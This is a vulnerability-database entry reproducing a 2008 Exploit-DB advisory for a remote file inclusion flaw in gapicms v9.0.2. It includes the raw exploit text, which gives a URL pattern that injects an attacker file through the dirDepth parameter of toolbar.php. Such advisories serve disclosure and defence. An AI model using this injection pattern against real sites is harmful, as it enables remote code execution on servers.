gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability

vendor:

gapicms

by:

Ghost Hacker [ R-H TeaM ]

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: gapicms

Affected Version From: gapicms v9.0.2

Affected Version To: gapicms v9.0.2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability

A vulnerability in gapicms v9.0.2 allows remote attackers to include arbitrary files via a URL in the dirDepth parameter to ktmlpro/includes/ktedit/toolbar.php.

Mitigation:

Ensure that user-supplied input is properly validated and filtered before being used in file operations.

Source

Exploit-DB raw data:

######################################################################################################
 gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulnerability
######################################################################################################
[~] Found : Ghost Hacker [ R-H TeaM ]           |,  .-.  .-.  ,|
[~] HOME  : www.Real-Hack.net                   | )(_o/  \o_)( | 
[~] Email : Ghost-r00t@Hotmail.com              |/     /\     \|
[~] Script : gapicms v9.0.2
[~] Download Script : http://heanet.dl.sourceforge.net/sourceforge/gapicms/gapicms_v9.0.2stable.tar.gz
############################# [ I love the Messenger of Allah Mohammad ] #############################
[~] Error ( ktmlpro/includes/ktedit/toolbar.php )
[~] Exploit :
http://xxxx/[path]/ktmlpro/includes/ktedit/toolbar.php?dirDepth=[Evil]
############################# [ I love the Messenger of Allah Mohammad ] ############################
[~] Greetz :
PROTO & QaTaR BoeZ TeaM & x.CJP.x & Dmar al3noOoz & 4Bo3tB & Mr.JUVE & Mr.hope & LeGeNd HaCkEr ..
Root Hacker & Jiko & ScarY.HaCkEr & Qptan & the-pirate.org & My Blog [ gh0st10.wordpress.com ]
All Member Real Hack And All My Friends ..
######################################################################################################
 Real Hack Team ( R-H ) ..
######################################################################################################

# milw0rm.com [2008-07-10]